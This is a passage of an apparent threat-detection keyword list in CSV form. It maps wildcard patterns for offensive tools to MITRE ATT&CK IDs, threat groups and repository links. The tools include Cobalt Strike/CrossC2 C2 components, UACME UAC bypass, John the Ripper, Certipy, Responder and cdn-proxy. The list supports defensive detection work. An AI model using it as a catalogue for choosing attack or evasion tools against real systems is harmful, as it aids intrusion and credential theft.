T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_rebind_*_get_recv*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_rebind_*_get_send*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_rebind_*_post_recv*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_rebind_*_post_send*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2_udp_server*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cc2FilesColor.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*cc2ProcessColor.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be 
used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*ccac7cdcbd419f3184c3886f5c36669ff9f7714b57a1249e2bb4be07b492c8ac*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*ccache2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ccache2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - 
T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*CCHOST=127.0.0.1*/tmp/c2*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*cckuailong/reapoc*,offensive_tool_keyword,reapoc,OpenSource Poc && Vulnerable-Target Storage Box.,T1552,TA0006,N/A,N/A,Exploitation tools,https://github.com/cckuailong/reapoc,1,1,N/A,N/A,7,629,219,2023-02-06T08:27:09Z,2021-11-28T00:46:27Z -*CCob/BOF.NET*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*CCob/ThreadlessInject*,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - 
T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,1,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -*cd *.::$index_allocation*,greyware_tool_keyword,$index_allocation,creation of hidden folders (and file) via ...$.......::$index_allocation,T1027.001 - T1564.001,TA0005 ,N/A,N/A,Defense Evasion,https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*cd ./whereami/*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/whereami,1,0,N/A,10,10,152,27,2023-03-13T15:56:38Z,2021-08-19T22:32:34Z -*cd ffuf*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*cd 
golang_c2*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,0,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*cd inceptor*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1027 - T1055 - T1070 - T1112 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*cd katoolin3*,offensive_tool_keyword,katoolin3,Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.,T1203 - T1090 - T1020,TA0006 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/s-h-3-l-l/katoolin3,1,0,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z -*cd koadic*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*cd ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*cd PurplePanda*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,0,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z -*CD3578F6-01B7-48C9-9140-1AFA44B3A7C0*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*cd40dbcdae84b1c8606f29342066547069ed5a33*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*cddownloadelevategetprivsinjectpersistportscanpspwdrunassaveshellshutdownsleep*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,0,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*cdimage.kali.org/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. 
Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cdn_proxy cloudflare ,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,,,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,0,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*cdn_proxy_burp_ext.py*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,1,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*cdn-proxy -*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,0,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*cdn-proxy cloudfront *,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,0,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*cdn-proxy.git*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense 
Evasion,https://github.com/RyanJarv/cdn-proxy,1,1,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*cdn-proxy/burp_extension*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,1,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*Cdn-Proxy-Host*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,1,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*Cdn-Proxy-Origin*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,0,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*cdn-scanner -*,offensive_tool_keyword,cdn-proxy,cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.,T1100 - T1090 - T1105 - T1133 - T1190,TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/RyanJarv/cdn-proxy,1,0,N/A,N/A,3,213,25,2022-08-25T00:40:25Z,2022-03-07T21:11:07Z -*CE895D82-85AA-41D9-935A-9625312D87D0*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,0,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z 
-*cef0c644e3203b086519fbb77ccc50589b59d5b9a44adfb72a7f2bc6924e9878*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*celerystalk*,offensive_tool_keyword,celerystalk,celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.,T1046 - T1057 - T1082 - T1087 - T1069,TA0001 - TA0007,N/A,N/A,Information Gathering,https://github.com/sethsec/celerystalk,1,0,N/A,N/A,4,389,75,2021-03-24T01:23:11Z,2018-08-13T04:21:37Z -*cerbrutus.py*,offensive_tool_keyword,cerbrutus,Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Cerbrutus-BruteForcer/cerbrutus,1,1,N/A,N/A,3,290,42,2021-08-22T19:05:45Z,2021-07-07T19:11:40Z -*Cerbrutus-BruteForcer*,offensive_tool_keyword,cerbrutus,Network brute force tool. written in Python. Faster than other existing solutions (including the main leader in the network brute force market).,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Cerbrutus-BruteForcer/cerbrutus,1,1,N/A,N/A,3,290,42,2021-08-22T19:05:45Z,2021-07-07T19:11:40Z -*cert*responder.crt*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,0,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*cert*responder.key*,offensive_tool_keyword,responder,LLMNR. 
NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,0,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*certi.py_vulntemplates_output*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*certi_py_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Certify.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*certipy account *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy auth *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy ca *,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -*certipy ca -backup*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation 